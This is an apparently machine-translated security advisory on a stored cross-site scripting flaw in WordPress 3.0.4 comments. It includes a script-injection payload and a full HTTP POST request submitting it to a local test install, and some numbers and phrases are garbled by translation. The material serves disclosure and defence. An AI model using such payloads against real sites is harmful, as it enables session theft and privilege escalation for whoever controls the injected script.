WordPress 3.0.4 stored XSS-vulnerability warning-the black bar safety net

2011-01-01T00:00:00
ID MYHACK58:62201128736
Type myhack58
Reporter 佚名
Modified 2011-01-01T00:00:00

Description

WordPress is a PHP language development of the popular blogging platform, WordPress 3.0.4 treatment comments the presence of the storage typeXSSvulnerabilities, successful exploitation of the vulnerability could lead to session information leakage, which may lead to elevation of privileges. In addition, the use of the vulnerability need to be ordinary users permissions.

[+]info: ~~~~~~~~~ + Title: Wordpress 3.0.4 Stored XSS (Role: Editor) + Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-005.txt + Advisory ID: 2010-005 + Versions: Wordpress 3.0.4, 3.0.3 (maybe earlies versions) + Date: 30/12/2010 + Vendor: WordPress Blog Tool and Publishing Platform + Impact: Execute Malicious Javascript Codes + CWE-ID: 7 9 (Cross-site Scripting) + Credit: Anatolia Security + Author: Sir - sir[at]anatoliasecurity[dot]com

[+]poc: ~~~~~~~~~ + Description: Attackers can execute malicious javascript codes or hijacking SESSION for privilege escalation. The attacker has to be the authority of the editor.

Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png PoC: '"--></style></script><script>alert('XSS')</script>

POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1 Host: localhost Connection: keep-alive Referer: http://localhost/wordpress304/?page_id=2 Content-Length: 1 8 9 Cache-Control: max-age=0 Origin: http://localhost Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8 8 5 9-9,utf-8;q=0.7,*;q=0.3 Cookie: wp-settings-time-1=1 2 9 3 7 1 9 6 5 1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor%7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1 2 9 3 7 2 0 2 8 5

comment=%2 7% 2 2--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%2 8%27XSS%2 7% 2 9%3C%2Fscript%3E&submit=Post+Comment&comment_post_ID=2&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/15867